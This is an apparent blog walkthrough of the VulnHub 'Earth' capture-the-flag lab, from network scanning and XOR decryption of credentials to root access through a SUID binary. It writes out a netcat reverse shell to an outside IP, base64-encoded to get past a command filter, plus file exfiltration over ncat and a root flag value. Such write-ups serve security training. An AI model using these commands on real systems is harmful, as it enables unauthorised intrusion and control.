VULNHUB EARTH WALKTHROUGH

6 min readSep 23, 2024

I RECONNAISSANCE

1.Network Discovery with ARP Scan : Identifying the target machine’s IP address within your network using arp-scan

This command scans your local network and lists active devices along with their IP addresses. Look for the IP address associated with the target machine. Found the target’s IP as 192.168.1.19

2.Port Scanning with Nmap : After identifying the target’s IP, scan the machine for open ports and services using nmap.

The -sV option helps identify service versions, and -A enables OS detection, version detection, and script scanning.

Based on the scan results, you find the following open ports: port 22 (ssh), 80 (http) & 443 (https).

3.Tried to search the ip but it says bad request .

4.Handling the 400 Bad Request Error (DNS Configuration): Since accessing the web server through http://192.168.1.19 gives a “400 Bad Request” error, you need to add alternative DNS names.

Modify /etc/hosts File: Edit the /etc/hosts file to resolve DNS names for the target.

Add the following lines at the end of the file to map the IP to DNS names.

5.Access the Web Server with DNS Names:Now, access the web server using the domain name: http://earth.local/

6.As you can see now the page is looking different.

II ENUMERATION

1. Web Enumeration: use tool dirb to enumerate directories: dirb http://earth.local

2.Clicked the admin link.

3.Need to find username and password.

4. In my case, when I accessed http://terratest.earth.local, I received the same results as for earth.local. Therefore, I had to use https:// instead.Found robots.txt from : dirb https://terratest.earth.local

5.Found these by typing https://terratest.earth.local/robots.txt

6.We got txt file with one interesing add-on which is testingnotes.txt.So we open it.

We know that XOR encryption was used to encrypt the messages we saw on the Earth main page. If you read carefully there is an entry saying : testdata.txt was used to test encryption, so let’s see if we can open testdata.txt.

So far, here’s what we’ve gathered:

· We have the username terra, found in testingnotes.txt.

· We have the encrypted message from the earth.local page.

· The encryption key is located in testdata.txt, which can be used to decrypt the message.

· We know there’s an admin page at earth.local/admin, so decrypting the message might help us figure out how to log in.

7.Tried to send a test message “hi this is a test message” with the key we got from http://terratest.earth.local/testdata.txt and got an encrypted message .

8.After trying all the encrypted messages we found that the last string contain some human redable text.

Press enter or click to view image in full size

9.We get the string earthclimatechangebad4humans repeated over and over again.

Because of the way it is repeated and cut off, that probably means earthclimatechangebad4humans may be the key.

III GAINING INTIAL ACESS

1.Found username and password.

Fortunately, terra:earthclimatechangebad4humans were the login credentials

2.So we got a command executable page ,tried ls command and other commands.

After trying to many commands and tried to get into many directories ,then we found that the user_flag is located at /var/earth_web/user_flag.txt.

3.Tried the command cat /var/earth_web/user_flag.txt and got the user_flag.

4.Now we want to establish a remote access to our terminal using netcat . But we can’t run this command so we are going to convert the command “nc -e /bin/bash 192.168.1.9 7774 “ using base64 encoding.

6.On our terminal start listening using netcat.

5.Now we want to run this command on the web executable page echo “bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMS45IDc3NzQ=” | base64 -d | bash .

7.The remote connection got established.

8.Tried ls to check whether it is running.

9.To upgrade my shell Iimits I used the command :
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

10.Got acess

IV ESCALATING PRIVILEGES

1.Now we want to figure out how to get to root. The first thing I did was run ‘sudo -l’ to figure out what I can run as a sudo user.But it requires password. So we are gonna do: find / -perm -u=s -type f 2>/dev/null , used to search for files that have the SUID permission set.

There is a binary called ‘reset_root.

2.When I tried running the binary, it failed with an error message stating that “all triggers not present.”

I discovered that if the binary executes successfully, it would change root’s password to ‘Earth’. To determine the necessary triggers, I transferred the binary to my Kali Linux machine for further analysis.

3.To do that, I just set up a ncat listener on my Kali machine to send any output to a file, and then sent it over on the shell I had on the victim machine.

4.Got the file reset_root.

5.I changed the permissions on the reset_root binary so that it is executable.

6.Then used the ltrace command on it. Ltrace is essentially a command that runs another binary and sees what libraries are called. This is a great way to see what the ‘triggers’ the binary needs.

7. I saw what the triggers are neede for the binary to run successfully. I switched back and created those files.

8.Then after running the binary reset_root , root password was switched to Earth.

9.Got root acess.

10.Go to root directory and found root_flag. And cat root_flag.txt .

11.Got root flag .

[root_flag_b0da9554d29db2117b02aa8b66ec492e]